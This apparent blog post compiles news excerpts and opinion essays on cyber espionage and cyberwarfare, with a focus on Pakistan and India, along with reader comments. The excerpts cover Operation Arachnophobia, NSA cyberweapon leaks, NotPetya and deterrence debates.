Operation Arachnophobia is suspected to have originated in Pakistan.
Bloodmoney: A Novel of Espionage:
Washington Post columnist David Ignatius frequently writes about the activities of intelligence agencies and often cites "anonymous" intelligence sources to buttress his opinions. He is also a novelist who draws upon his knowledge to write spy thrillers.
Ignatius's 2011 fiction "Bloodmoney: A Novel of Espionage" features a computer science professor Dr. Omar who teaches at a Pakistani university as the main character. Omar, born in Pakistan's tribal region of South Waziristan, is a cyber security expert. One of Omar's specialties is his deep knowledge of SWIFT, a network operated by Society for Worldwide Interbank Financial Telecommunication that tracks all international financial transactions, including credit card charges.
Omar's parents and his entire family are killed in a misdirected US drone strike. Soon after the tragedy, several undercover CIA agents are killed within days after their arrival in Pakistan. American and Pakistani investigations seek the professor's help to solve these murders. Ignatius's novel ends with the identification of the professor as the main culprit in the assassinations of CIA agents.
In 2014, researchers from FireEye, a Silicon Valley cyber security company founded by a Pakistani-American, and ThreatConnect teamed up in their investigation of "Operation Arachnophobia" targeting Indian computers. It features a custom malware family dubbed Bitterbug that serves as the backdoor for stealing information. Though the researchers say they have not identified the specific victim organizations, they have spotted malware bundled with decoy documents related to Indian issues, according to DarkReading.com.
The reason it was dubbed "Operation Arachnophobia" has to do with the fact that variants of the Bitterburg malware detected by the researchers included build paths containing the strings “Tranchulas” and “umairaziz27”, where Tranchulas is the name of an Islamabad-based Pakistani security firm and Umair Aziz is one of its employees.
Operation Arachnophobia targeted Indian officials. It appears to have been Pakistan's response to India's Operation Hangover that targeted Pakistan. Investigations by Norway-based security firm Norman have shown that the Operation Hangover attack infrastructure primarily was used as a means to extract security-related information from Pakistan and, to a lesser extent, China.
"Targeted attacks are all too common these days, but this one is certainly noteworthy for its failure to employ advanced tools to conduct its campaigns," said Jean Ian-Boutin, malware researcher at ESET security company. "Publicly available tools to gather information on infected systems shows that the attackers did not go to great lengths to cover their tracks. On the other hand, maybe they see no need to implement stealthier techniques because the simple ways still work."
Attack Easier Than Defense:
The fact that cyber attacks so often succeed suggests that it's easier to attack a system than to defend it. By the time such attacks are detected, it's already too late. A lot of valuable information has already been lost to attackers.
However, it's still very important to possess the cyberattack capability as a deterrent to attacks. Those who lack the capacity to retaliate invite even more brazen cyberattacks.
Need for International Treaties:
Cyberattacks on infrastructure can have disastrous consequences with significant loss of human life. Disabling power grids and communication networks can hurt a lot of people and prevent delivery of aid to victims of disaster. It's important that nations work together to agree on some norms for what is permissible and what is not before there is a catastrophe.
About 30 nations, including US, UK, France, Germany, Russia, China, India, Iran, Israel and Pakistan, possess cyber espionage and attack capabilities. Growth and proliferation of such technologies present a serious threat to world peace. There is an urgent need for nations of the world to come together to agree on reasonable restrictions to prevent disasters.
Revolution in Military Affairs: Cyberweapons and Robots
Pakistani-American Founder of Fireeye Cyber Firm
Pakistan Boosts Surveillance to Fight Terror
Pakistan's Biometric Registration Database
Operation Zarb e Azb Launch
Ex Indian Spy Documents RAW's Successes in Pakistan
Intelligence Failures in Preventing Daily Carnage in Pakistan
What If Musharraf Had Said NO to US After 911?
Pakistani Computer Scientist Fights Terror
Pakistani Killer Drones to Support Anti-Terror Campaign
3G 4G Rollout Spurs Data Services Boom in Pakistan
Fiber Optic Connectivity in Pakistan
MALWARE ATTACKS USED BY THE U.S. GOVERNMENT RETAIN POTENCY FOR MANY YEARS, NEW EVIDENCE INDICATES
A NEW REPORT from Rand Corp. may help shed light on the government’s arsenal of malicious software, including the size of its stockpile of so-called “zero days” — hacks that hit undisclosed vulnerabilities in computers, smartphones, and other digital devices.
The report also provides evidence that such vulnerabilities are long lasting. The findings are of particular interest because not much is known about the U.S. government’s controversial use of zero days. Officials have long refused to say how many such attacks are in the government’s arsenal or how long it uses them before disclosing information about the vulnerabilities they exploit so software vendors can patch the holes.
Rand’s report is based on unprecedented access to a database of zero days from a company that sells them to governments and other customers on the “gray market.” The collection contains about 200 entries — about the same number of zero days some experts believe the government to have. Rand found that the exploits had an average lifespan of 6.9 years before the vulnerability each targeted was disclosed to the software maker to be fixed, or before the vendor made upgrades to the code that unwittingly eliminated the security hole.
Some of the exploits survived even longer than this. About 25 percent had a lifespan of a decade or longer. But another 25 percent survived less than 18 months before they were patched or rendered obsolete through software upgrades.
Rand’s researchers found that there was no pattern around which exploits lived a long or short life — severe vulnerabilities were not more likely to be fixed quickly than minor ones, nor were vulnerabilities in programs that were more widely available.
“The relatively long life expectancy of 6.9 years means that zero-day vulnerabilities — in particular the ones that exploits are created for [in the gray market] — are likely old,” write lead researchers Lillian Ablon and Andy Bogart in their paper “Zero Days, Thousands of Nights.”
Rand, a nonprofit research group, is the first to study in this manner a database of exploits that are in the wild and being actively used in hacking operations. Previous studies of zero days have used manufactured data or the vulnerabilities and exploits that get submitted to vendor bug bounty programs — programs in which software makers or website owners pay researchers for security holes found in their software or websites.
The database used in the study belongs to an anonymous company referred to in the report as “Busby,” which amassed the exploits over 14 years, going back to 2002. Busby’s full database actually has around 230 exploits in it, about 100 of which are still considered active, meaning they are unknown to the software vendors and therefore no patches are available to fix them. The Rand researchers only had access to information on 207 zero days — the rest are recently discovered exploits the company withheld from Rand’s set “due to operational sensitivity.”
While it’s not known how many of these exploits are in the U.S. government’s arsenal, Jason Healey, a senior research scholar at Columbia University’s School for International and Public Affairs, believes the U.S. government’s zero-day stockpile is comparable in size to Busby’s.
Actually, Pakistan has more to worry. Pakistan's critical infrastructure runs on Chinese manufactured devices containing Chinese firmwares. Like Pakistan's mobile network. Or Internet routers. Chinese firmwares are usually poorly written with gaping holes like never seen before. Few example are ZTE and Huwei. Modems and Routers produced by these firms are riddled with very easy to exploit bugs. My favourite one is a DoS attack involving invoking reboot.cgi. Chinese are so careless with their firmware that they do not even check for authorized session. A script kidde can bring entire bank to halt if they were using Chinese modems to connect to internet.
Anon: " Like Pakistan's mobile network. Or Internet routers. Chinese firmwares are usually poorly written with gaping holes like never seen before. Few example are ZTE and Huwei. "
Both ZTE and Huawei have huge market share all over the world. Here's a BT report:
"n 2011/12, Huawei was ahead of Ericsson and Nokia Siemens Network (NSN), the European telecom equipment makers which have long held the top two spots in the country by revenues. But the first few years were full of hurdles for both Huawei and ZTE, also a Chinese telecom equipment maker. European companies such as NSN, Ericsson and Alcatel Lucent had been operating in India for decades and were trusted. There was a widespread perception that Chinese products would be of inferior quality."
And Europe is using a lot of Chinese telecom equipment:
A second strategy, exemplified by telecoms equipment maker Huawei Technologies, is a straightforward effort to raise margins by diversifying out of the low-margin Chinese market into higher-margin foreign ones. Huawei has derived more than half its sales from abroad for over a decade, and has gradually increased its presence in European markets, in part through loose alliances with major clients such as BT, Orange, Deutsche Telekom, and Telefónica. It has also moved quickly into the device sector. From tablets to smartphones and 3G keys, its products are now spreading across Europe, as are its greenfield investments in European R&D centers. Its efforts to expand through M&A have been hampered by its image as an arm of the Chinese state—although privately owned, it has benefited from huge lines of credit from Chinese policy banks, and has never put to rest rumors of close ties with the People’s Liberation Army.
Pakistan has large number of hackers and has capability to respond to any threat.
The global war in Cyberia has begun — and will never end
by NIALL FERGUSON
To each American administration, its war. For Truman and Eisenhower, Korea. For Kennedy, Johnson and Nixon, Vietnam. For Carter and Reagan, the culmination of the Cold War. For both Bushes, Iraq. For Clinton, ex-Yugoslavia. For Obama, Afghanistan.
Which will be Donald Trump’s war? There is good reason to fear it could the Second Korean War. Or it could be yet another quagmire in the Middle East. His most excitable critics warn that the Third World War will happen on his watch. But I am more worried about the First Cyber War — because that war has already begun.
Last week’s cyber-attack was just the latest directed against the US by WikiLeaks: the release of a vast cache of documents stolen from the CIA.
In a tweet, WikiLeaks claimed these revealed “CIA hacker malware a threat to journalists: infests iPhone, Android bypassing Signal, Confide encryption”.
Actually, none of the documents mentions Signal, but that’s not the point. In the strange land of Cyberia — the twilight zone inhabited by Russian intelligence operatives — cyber-warfare is mainly about the spread of disinformation under the guise of leaking classified or confidential information.
To visit the WikiLeaks website is to enter the trophy room of Cyberia. Here is the “Hillary Clinton Email Archive”, over there are “The Podesta Emails”. Not all the leaked documents are American, but you will look in vain for leaks calculated to embarrass Russia. Julian Assange may still skulk in the Ecuadorean embassy in London but he lives in Cyberia, Vladimir Putin’s honoured guest.
Computer scientists have understood the disruptive potential of cyber-warfare since the earliest days of the internet. At first it was adolescent hackers who caused mayhem: geeks such as Robert Tappan Morris, who almost crashed the internet in 1988 by releasing a highly infectious software worm.
It is still the case that a lot of cyber-attacks are carried out by non-state actors: teenage vandals, criminals, “hacktivists” or terrorist organisations. However, the most striking development of the past year has been the advent of Cyberia.
As the country that built the internet, the US was bound to lead in cyber-warfare. During the 2003 Iraq invasion, US spies penetrated Iraqi networks and sent messages urging generals to surrender. Seven years later the US and Israel unleashed the Stuxnet virus on Iran’s nuclear facilities. The problem is not just that two can play at that game. It is that no one knows how many people can play at any number of cyber-games.
In recent years, the US has found itself under cyber-attack from Iran, North Korea and China. However, these attacks were directed against companies (notably Sony Pictures). The Russians are the first to wage war directly against the US government. They learnt the ropes in attacks on Estonia, Georgia and Ukraine. Last year, using WikiLeaks and the blogger Guccifer 2.0 as proxies, they launched a sustained assault on the US political system, using the Clinton emails and those of her campaign manager John Podesta to undermine the credibility of the Democratic Party’s presidential candidate.
Like the financial network, our social, commercial and infrastructural networks are under constant attack from fools and knaves. There is nothing we can do to stop them. The most we can do is to design networks so that the ravages of Cyberia can’t cause a total outage.
Trump’s war has begun: it is the First Cyber War. Like all wars, its first casualty was truth. Unlike other wars, it will have no last casualty, as it is a war without end. Get used to it. Or get rid of your computer.
Let’s leave aside the question of whether that interference decided the election in favour of Trump. The critical point is that Moscow was undeterred. For specialists in national security, this is only one of many perplexing features of cyber-war. Accustomed to the elegant theories of “mutually assured destruction” that evolved during the Cold War, they are struggling to develop a doctrine for a different form of conflict, with countless potential attackers and numerous gradations of destructiveness.
For Joseph Nye of Harvard’s Kennedy School, deterrence may be salvageable, but that can only be true now if America is prepared to make an example of an aggressor. The three other options Nye proposes are to ramp up cyber-security, to try to “entangle” potential aggressors in trade and other relationships (so as to raise the cost of cyber-attacks to them), or to establish global taboos against cyber, like those against biological and chemical weapons.
Nye’s analysis is not very comforting. Given the sheer number of cyber-aggressors, defence seems doomed to lag behind offence. And the Russians have proved themselves to be indifferent to both entanglement and taboos, even if China seems more amenable to Nye’s approach.
How scared should we be of Cyberia? For Princeton’s Anne-Marie Slaughter, our hyper-networked world is, on balance, a benign place and America “will gradually find the golden mean of network power”. At the other extreme is Joshua Cooper Ramo, whose book T he Seventh Sense argues for the erection of real and virtual “gates” to shut out the Russians and other malefactors. But Ramo himself quotes the three rules of computer security devised by the NSA cryptographer Robert Morris Sr: 1. Do not own a computer; 2. Do not power it on; 3. Do not use it. If we all ignore those rules, how will any gates keep out the Cyberians?
An intellectual arms race is on to devise a viable doctrine of cyber-security. My 10 cents’ worth is that those steeped in the traditional thinking of national security will not come up with it. A realistic goal is not to deter attacks or retaliate against them but to regulate all the various networks on which our society depends so that they are resilient — or, better still, “anti-fragile”, a term coined by Nassim Taleb to describe a system that grows stronger under attack.
Can Cyber Warfare Be Deterred? by Joseph Nye
Fear of a “cyber Pearl Harbor” first appeared in the 1990s, and for the past two decades, policymakers have worried that hackers could blow up oil pipelines, contaminate the water supply, open floodgates and send airplanes on collision courses by hacking air traffic control systems. In 2012, then-US Secretary of Defense Leon Panetta warned that hackers could “shut down the power grid across large parts of the country.”
None of these catastrophic scenarios has occurred, but they certainly cannot be ruled out. At a more modest level, hackers were able to destroy a blast furnace at a German steel mill last year. So the security question is straightforward: Can such destructive actions be deterred?
The Year Ahead 2017 Cover Image
It is sometimes said that deterrence is not an effective strategy in cyberspace, because of the difficulties in attributing the source of an attack and because of the large and diverse number of state and non-state actors involved. We are often not sure whose assets we can hold at risk and for how long.
Attribution is, indeed, a serious problem. How can you retaliate when there is no return address? Nuclear attribution is not perfect, but there are only nine states with nuclear weapons; the isotopic identifiers of their nuclear materials are relatively well known; and non-state actors face high entry barriers.
None of this is true in cyberspace where a weapon can consist of a few lines of code that can be invented (or purchased on the so-called dark web) by any number of state or non-state actors. A sophisticated attacker can hide the point of origin behind the false flags of several remote servers.
While forensics can handle many “hops” among servers, it often takes time. For example, an attack in 2014 in which 76 million client addresses were stolen from JPMorgan Chase was widely attributed to Russia. By 2015, however, the US Department of Justice identified the perpetrators as a sophisticated criminal gang led by two Israelis and an American citizen who lives in Moscow and Tel Aviv.
Attribution, however, is a matter of degree. Despite the dangers of false flags and the difficulty of obtaining prompt, high-quality attribution that would stand up in a court of law, there is often enough attribution to enable deterrence.
For example, in the 2014 attack on SONY Pictures, the United States initially tried to avoid full disclosure of the means by which it attributed the attack to North Korea, and encountered widespread skepticism as a result. Within weeks, a press leak revealed that the US had access to North Korean networks. Skepticism diminished, but at the cost of revealing a sensitive source of intelligence.
Prompt, high-quality attribution is often difficult and costly, but not impossible. Not only are governments improving their capabilities, but many private-sector companies are entering the game, and their participation reduces the costs to governments of having to disclose sensitive sources. Many situations are matters of degree, and as technology improves the forensics of attribution, the strength of deterrence may increase.
Moreover, analysts should not limit themselves to the classic instruments of punishment and denial as they assess cyber deterrence. Attention should also be paid to deterrence by economic entanglement and by norms.
Economic entanglement can alter the cost-benefit calculation of a major state like China, where the blowback effects of an attack on, say, the US power grid could hurt the Chinese economy. Entanglement probably has little effect on a state like North Korea, which is weakly linked to the global economy. It is not clear how much entanglement affects non-state actors. Some may be like parasites that suffer if they kill their host, but others may be indifferent to such effects.
As for norms, major states have agreed that cyber war will be limited by the law of armed conflict, which requires discrimination between military and civilian targets and proportionality in terms of consequences. Last July, the United Nations Group of Government Experts recommended excluding civilian targets from cyberattacks, and that norm was endorsed at last month’s G-20 summit.
It has been suggested that one reason why cyber weapons have not been used more in war thus far stems precisely from uncertainty about the effects on civilian targets and unpredictable consequences. Such norms may have deterred the use of cyber weapons in US actions against Iraqi and Libyan air defenses. And the use of cyber instruments in Russia’s “hybrid” wars in Georgia and Ukraine has been relatively limited.
The relationship among the variables in cyber deterrence is a dynamic one that will be affected by technology and learning, with innovation occurring at a faster pace than was true of nuclear weapons. For example, better attribution forensics may enhance the role of punishment; and better defenses through encryption may increase deterrence by denial. As a result, the current advantage of offense over defense may change over time.
Cyber learning is also important. As states and organizations come to understand better the importance of the Internet to their economic wellbeing, cost-benefit calculations of the utility of cyber warfare may change, just as learning over time altered the understanding of the costs of nuclear warfare.
Unlike the nuclear age, when it comes to deterrence in the cyber era, one size does not fit all. Or are we prisoners of an overly simple image of the past? After all, when nuclear punishment seemed too draconian to be credible, the US adopted a conventional flexible response to add an element of denial in its effort to deter a Soviet invasion of Western Europe. And while the US never agreed to a formal norm of “no first use of nuclear weapons,” eventually such a taboo evolved, at least among the major states. Deterrence in the cyber era may not be what it used to be, but maybe it never was
US scientists at U of Michigan hack' #India electronic #vote17 machines - BBC News. #UPElection2017
Scientists at a US university say they have developed a technique to hack into Indian electronic voting machines.
After connecting a home-made device to a machine, University of Michigan researchers were able to change results by sending text messages from a mobile.
Indian election officials say their machines are foolproof, and that it would be very difficult even to get hold of a machine to tamper with it.
India uses about 1.4m electronic voting machines in each general election.
A video posted on the internet by the researchers at the University of Michigan purportedly shows them connecting a home-made electronic device to one of the voting machines used in India.
Professor J Alex Halderman, who led the project, said the device allowed them to change the results on the machine by sending it messages from a mobile phone.
"We made an imitation display board that looks almost exactly like the real display in the machines," he told the BBC. "But underneath some of the components of the board, we hide a microprocessor and a Bluetooth radio."
"Our lookalike display board intercepts the vote totals that the machine is trying to display and replaces them with dishonest totals - basically whatever the bad guy wants to show up at the end of the election."
In addition, they added a small microprocessor which they say can change the votes stored in the machine between the election and the vote-counting session.
India's electronic voting machines are considered to be among the most tamperproof in the world.
There is no software to manipulate - records of candidates and votes cast are stored on purpose-built computer chips.
Paper and wax seals
India's Deputy Election Commissioner, Alok Shukla, said even getting hold of machines to tamper with would be very difficult.
"It is not just the machine, but the overall administrative safeguards which we use that make it absolutely impossible for anybody to open the machine," he told the BBC.
"Before the elections take place, the machine is set in the presence of the candidates and their representatives. These people are allowed to put their seal on the machine, and nobody can open the machine without breaking the seals."
The researchers said the paper and wax seals could be easily faked.
However, for their system to have any impact they would need to install their microchips on many voting machines, no easy task when 1,368,430 were used in the last general election in 2009.
India, Pakistan cyber war intensifies
NEW DELHI: Indian hackers claimed to have hacked Islamabad, Peshawar, Multan International and Karachi airport
The hack comes just days after Pakistani hackers, identifying themselves as 'Alone Injector', posted offensive content on NSG's official homepage. As most were preparing to celebrate New Year, hackers from India and Pakistan were busy firing shots across the online border in the ongoing cyber war between the two countries.
Indian hackers allegedly infected three Pakistan airport websites with ransomware claiming that this was to avenge hacking of the official website of the elite National Security Guard (NSG) by their counterpart in Pakistan.
Indian hackers on Monday night claimed to have hacked Islamabad, Peshawar, Multan International and Karachi airport website. Not only they have hacked and brought the website down, but have also injected it with ransomware malware which restricts the owners use of their website. Indian hackers locked the access to the websites and are demanding bitcoins (virtual money) in exchange for unlocking it. However, an Indian hacker told Mail Today that last time the money they got from Pakistan to unlock their computer was donated to needy kids but this time, they will not share the key to unlock the sites.
The move came just a day after Pakistani hackers, identifying themselves as 'Alone Injector', posted the offensive content on NSG's official homepage. The website belonging to the 'black cat' commandos is maintained from the NSG headquarters and gives out basic information about the force, its origin and operations.
The matter has been brought to the notice of the National Informatics Centre, and remedial action is in process. Retaliating immediately, Indian hackers have launched a massive attack on crucial Pakistan establishment and warned both Pakistan hackers and the government against attacking India further.
This hacking group in past had infected the Pakistan government systems, taken control over hundreds of computers and locked its complete data, making it inaccessible - using a malicious programme. The hacking group also leaked details of Pakistan army officers and banking details.
However, there was no confirmation by any security agency about it as the hackers from both the countries are not officially. This fighting started last week after Pakistan cyber attackers hacked
Thiruvananthapuram airport's website, a group of cyber experts from Kerala - the 'Mallu Cyber Soldiers' - decided to respond in kind: by hacking the website of a Pakistani airport. The hacker obtained the login information for the website of the Sialkot International Airport in Pakistan's Punjab province. They changed the password and shared the new login details with the public. Experts believe the hacking of airport websites can be used to get out crucial information about flights, which can have serious consequences.
Moreover, leaking of details about the individual airports - from logistics to facilities - is also dangerous. Experts believe that intelligence-gathering process has increased as hackers are not only defacing the sites but are silently spying on critical networks. 'Indian hackers have only replied after observing malicious intention of Pakistani hackers.
'Techies across the border targeted Indian sites result of which NSG's website was hacked. Such fights are common but now the intensity of attacks have increased many fold as hackers from both the countries are targeting crucial websites,' said Kislay Choudhary, a cyber crime expert.
America must defend itself against the real national security menace
by Fareed Zakaria
Since the North Korean government’s 2014 attacks on Sony Pictures Entertainment, many in the intelligence community, including Adm. Michael S. Rogers, have warned that “we’re at a tipping point.” Rogers, head of the National Security Agency and U.S. Cyber Command, testified to Congress in 2015 that the country had no adequate deterrent against cyberattacks. He and many others have argued for an offensive capacity forceful enough to dissuade future threats.
But the digital realm is a complex one, and old rules will not easily translate. The analogy that many make is to nuclear weapons. In the early Cold War, that new category of weaponry led to the doctrine of deterrence, which in turn led to arms-control negotiations and other mechanisms to foster stable, predictable relations among the world’s nuclear powers.
But this won’t work in the cyber realm, Joseph Nye says in an important new essay in the journal International Security. First, the goal of nuclear deterrence has been “total prevention” — to avert a single use of nuclear weapons. Cyberattacks happen all the time, everywhere. The Defense Department reports getting 10 million attacks a day. Second, there is the problem of attribution. Nye quotes defense official William Lynn, who observed in 2010, “Whereas a missile comes with a return address, a computer virus generally does not.” That’s why it is so easy for the Russian government to deny any involvement with the hacking against the Democratic National Committee. It is hard to establish ironclad proof of the source of any cyberattack — which is a large part of its attractiveness as an asymmetrical weapon.
Nye argues that there are four ways to deal with cyberattacks: punishment, entanglement, defense and taboos. Punishment involves retaliation, and although it is worth pursuing, both sides can play that game, and it could easily spiral out of control.
Entanglement means that if other countries were to harm the United States, their own economies would suffer. It strikes me as of limited value because there are ways to attack the United States discreetly without shooting oneself in the foot (as Russia has shown recently, and as Chinese cybertheft of intellectual property shows as well). And it certainly wouldn’t deter groups such as the Islamic State, al-Qaeda or even WikiLeaks.
The other two strategies merit more consideration. Nye contends that the United States should develop a serious set of defenses, beyond simply governmental networks, that are modeled on public health. Regulations and information would encourage the private sector to follow some simple rules of “cyber hygiene” that could go a long way toward creating a secure national network. This new system of defenses should become standard in the digital world.
The final strategy Nye suggests is to develop taboos against certain forms of cyberwarfare. He points out that after the use of chemical weapons in World War I, a taboo grew around their use, was enacted into international law and has largely held for a century. Similarly, in the 1950s, many strategists saw no distinction between tactical nuclear weapons and “normal” weapons. Gradually, countries came to shun any use of nuclear weaponry, a mutual understanding that has also survived for decades. Nye recognizes that no one is going to stop using cyber-tools but believes that perhaps certain targets could be deemed off-limits, such as purely civilian equipment.
Of course, the development of such norms would involve multilateral negotiations, international forums, rules and institutions, all of which the Trump administration views as globaloney. But at least it is working hard to prevent Yemeni tourists from entering the country.
Wikileaks reveal #American #Spy Agency #NSA #Cyber Weapons Used to Hack #Pakistan mobile system http://bit.ly/2nQ1VHn via @techjuicepk
New information about the involvement of US in hacking Pakistan mobile system has been found in a release by Wikileaks. This leak points to NSA’s cyber weapons which include code related to hacking of Pakistan mobile system.
NSA’s interest in Pakistan
NSA, National Security Agency responsible for global monitoring, collection, and processing of information and data for foreign intelligence and counterintelligence purposes in the USA, has allegedly spied on Pakistani civilian and military leadership in the past. Edward Snowden, a former NSA employee, has also suggested in the past that NSA used wiretapping and cyber weapons to spy on many international leaders.
Scope of new information
On Saturday, Wikileaks revealed hundreds of cyber weapons variants which include code pointing towards NSA hacking Pakistan mobile system.
The link shared in the tweet by Wikileaks’ official account points to a Github repository containing the decrypted files pertaining to NSA cyber weapons. A complete analysis of these files by a cyber security expert is needed to further highlight the severity of the situation. Initial impressions, however, seem to indicate that these leaks will certainly provide more substance to previous allegations against NSA.
#Cyberattack Hits #Ukraine Then Spreads Internationally. #NSA #hackingtool #WannaCry #Petya #Russia
Computer systems from Ukraine to the United States were struck on Tuesday in an international cyberattack that was similar to a recent assault that crippled tens of thousands of machines worldwide.
In Kiev, the capital of Ukraine, A.T.M.s stopped working. About 80 miles away, workers were forced to manually monitor radiation at the old Chernobyl nuclear plant when their computers failed. And tech managers at companies around the world — from Maersk, the Danish shipping conglomerate, to Merck, the drug giant in the United States — were scrambling to respond. Even an Australian factory for the chocolate giant Cadbury was affected.
It was unclear who was behind this cyberattack, and the extent of its impact was still hard to gauge Tuesday. It started as an attack on Ukrainian government and business computer systems — an assault that appeared to have been intended to hit the day before a holiday marking the adoption in 1996 of Ukraine’s first Constitution after its break from the Soviet Union. The attack spread from there, causing collateral damage around the world.
The outbreak was the latest and perhaps the most sophisticated in a series of attacks making use of dozens of hacking tools that were stolen from the National Security Agency and leaked online in April by a group called the Shadow Brokers.
Like the WannaCry attacks in May, the latest global hacking took control of computers and demanded digital ransom from their owners to regain access. The new attack used the same National Security Agency hacking tool, Eternal Blue, that was used in the WannaCry episode, as well as two other methods to promote its spread, according to researchers at the computer security company Symantec.
The National Security Agency has not acknowledged its tools were used in WannaCry or other attacks. But computer security specialists are demanding that the agency help the rest of the world defend against the weapons it created.
“The N.S.A. needs to take a leadership role in working closely with security and operating system platform vendors such as Apple and Microsoft to address the plague that they’ve unleashed,” said Golan Ben-Oni, the global chief information officer at IDT, a Newark-based conglomerate hit by a separate attack in April that used the agency’s hacking tools. Mr. Ben-Oni warned federal officials that more serious attacks were probably on the horizon.
The vulnerability in Windows software used by Eternal Blue was patched by Microsoft in March, but as the WannaCry attacks demonstrated, hundreds of thousands of groups around the world failed to properly install the fix.
“Just because you roll out a patch doesn’t mean it’ll be put in place quickly,” said Carl Herberger, vice president for security at Radware. “The more bureaucratic an organization is, the higher chance it won’t have updated its software.”
Because the ransomware used at least two other ways to spread on Tuesday — including stealing victims’ credentials — even those who used the Microsoft patch could be vulnerable and potential targets for later attacks, according to researchers at F-Secure, a Finnish cybersecurity firm, and others.
A Microsoft spokesman said the company’s latest antivirus software should protect against the attack.
The Ukrainian government said several of its ministries, local banks and metro systems had been affected. A number of other European companies, including Rosneft, the Russian energy giant; Saint-Gobain, the French construction materials company; and WPP, the British advertising agency, also said they had been targeted.
The Opinion Pages | EDITORIAL
When Cyberweapons Go Missing
By THE EDITORIAL BOARDJULY 4, 2017
Twice in the past few months, powerful cyberattacks have wreaked havoc on the world, shutting down tens of thousands of computers, including critical machines in hospitals, a nuclear site and businesses. The attacks were initially thought to be schemes to collect ransom, but their goals — whether money, politics or just chaos — have become increasingly blurred. One thing seems clear: The weapons for the attack were developed by the National Security Agency and stolen from it.
That’s chilling. After the first attack, Brad Smith, the president of Microsoft, said the theft of the cyberweapons was equivalent to Tomahawk missiles’ being stolen from the military, and he issued a scathing critique of the government’s stockpiling of computer vulnerabilities. The N.S.A. has not only failed to assist in identifying the vulnerabilities its weapons were designed to exploit but has also not even acknowledged their existence or their theft.
It remains a mystery whether the N.S.A. knows how its weapons were stolen. What is known is that a group called Shadow Brokers started offering them for sale in August and made them public in April. It promised a fresh batch last month, offering them to monthly subscribers. Former intelligence officials said it was clear the weapons came from an N.S.A. unit formerly known as Tailored Access Operations.
Once publicly available, the weapons can be reconfigured for many purposes and used by anyone with some computer savvy. North Korea was thought to be a culprit in the first wave of attacks, and Russian hackers may have been behind the second. Other forces may be at work, too. A cybersecurity officer with the IDT Corporation in Newark, Golan Ben-Oni, has made waves with warnings that ransom demands could be a cover for far deeper invasions to steal confidential information.
Secrecy, of course, is the N.S.A.’s stock in trade, and acknowledging authorship of stolen cyberweapons runs counter to everything the spy agency does. A spokesman for the National Security Council at the White House was quoted as saying that the administration “is committed to responsibly balancing national security interests and public safety and security.”
Fixing this deadly serious problem is certain to be complex, but the task is urgent. The N.S.A. clearly needs to do a better job of safeguarding the cyberweapons it is developing and also neutralizing the damage their theft has unleashed. Microsoft, whose software vulnerabilities were exploited in the attacks, and companies that use its software will have to strengthen their defenses.
Beyond that, the federal government may want to offer grants as incentives to groups doing malware analysis. Once conclusively identified, the culprits behind the attacks must be penalized in some way, such as with sanctions. While the immediate focus needs to be on concrete responses, it is also worth thinking seriously about more global cooperation, such as the Digital Geneva Convention proposed by Microsoft as a way to prevent cyberwarfare.
Pakistan is currently lacking the offensive capability ....in recent times an wave of immediate sense of insecurity is being felt in top brass. we need to address this issue on war-footing basis. The Cyber Threat Landscape already showing Pakistan as top targeted countries specially its industrial base highly vulnerable to ICS attacks.
IT ministry to come up with plan to ensure country’s cyber-security
National12 HOURS AGO BY APP
Ministry of Information Technology has been entrusted with the responsibility to propose an appropriate organisation in order to ensure cyber-security of Pakistan.
The decision was taken during a high-level meeting on Thursday to develop a framework and way forward to coordinate and evolve a mechanism for country’s cyber-security.
National Security Adviser Nasser Khan Janjua chaired the meeting. National Security Division secretary, representatives from Ministry of Information and Broadcasting, Ministry of Information Technology, Pakistan Electronic Media Regulatory Authority (PEMRA), Pakistan Telecommunication Authority (PTA) and Federal Investigation Agency (FIA) attended the meeting.
Moreover, the Ministry of Information and Broadcasting will propose a mechanism that could chalk out a way forward towards the use of social media for a progressive Pakistan.
The meeting ended on a note that a next session would be scheduled soon to conclude the process of evolving a mechanism for ensuring cyber-security.
Ex-CIA officer arrested after US spy network is exposed in China
It was one of the worst intelligence failures for years
Andrew Buncombe New York @AndrewBuncombe a day ago
Last spring, The New York Times reported that as many as 20 US intelligence assets had been killed by China since 2010, destroying years worth of intelligence efforts in the country. One operative was allegedly shot and killed in front of his colleagues and his body left in the car park of a government building as a warning to others.
US officials described the losses as “one of the worst” intelligence breaches in decades, comparing it to the number of assets lost in the Soviet Union in the 1980s and 1990s, when two prominent US assets worked as double agents for the Soviets. Officials said the breach has destroyed years of network-building within the country.
The arrest of Mr Lee come as China is looking to increasingly spread its international influence – economically, diplomatically and militarily. At the same time, the US, under the America First strategy adopted by Donald Trump, appears to be retreating from many areas, such as the environment and international security, it once led.
A former CIA officer has been arrested and charged as part of an alleged espionage scandal investigators claim resulted in the collapse of the US spying network in China and the deaths or imprisonment of up to 20 agency informants.
Jerry Chun Shing Lee, 53, a naturalised US citizen, was arrested earlier this week after arriving at JFK International Airport in New York. Mr Lee, who currently lives in Hong Kong, appeared in court and was charged with illegally retaining classified records, including names and phone numbers of covert CIA assets.
Mr Lee, who served in the US Army from 1982-86, joined the CIA in 1994 and worked as a case officer trained in covert communications, surveillance detection, and the recruitment and the handling of assets.
“[Mr] Lee began working for the CIA as a case officer in 1994, maintained a Top Secret clearance and signed numerous non-disclosure agreements during his tenure at CIA,” according to a statement released by the US Department of Justice.
The arrest of Mr Lee, who has not offered a plea, is said to have marked the culmination for more than five years of intense counter-espionage operation launched by the FBI. That investigation was established in 2012, two years after the CIA started losing assets in China.
Reports in the US media said investigators were initially unsure whether the agency had been hacked by the Chinese authorities or whether the losses were the result of a mole.
According to an eight-page affidavit, Mr Lee, who left the CIA in 2007 and has been working for a well-known auction house, travelled from Hong Kong to northern Virginia, where he lived from 2012 to 2013 – apparently having been lured there with a fake job offer.
When he flew to Virginia, the FBI obtained a warrant to search Mr Lee’s luggage and hotel room. The court documents say agents found two small books with handwritten notes containing names and numbers of covert CIA employees and locations of covert facilities.
Mr Lee left the US in 2013 after being questioned on five different occasions by FBI agents. He never mentioned his possession of the books containing classified information, say the court documents.
The FBI affidavit makes no allegations of espionage against Mr Lee, only alleging illegal retention of documents. Any conviction on that offence carries a maximum penalty of 10 years in prison.
Malware allegedly designed by Pakistani hackers has become stronger: experts
GravityRAT, a malware allegedly designed by Pakistani hackers, has recently been updated further and equipped with anti-malware evasion capabilites, Maharashtra cybercrime officials said.
The RAT was first detected by Indian Computer Emergency Response Team, CERT-In, on various computers in 2017. It is designed to infliltrate computers and steal the data of users, and relay the stolen data to Command and Control centres in other countries. The ‘RAT’ in its name stands for Remote Access Trojan, which is a program capable of being controlled remotely and thus difficult to trace.
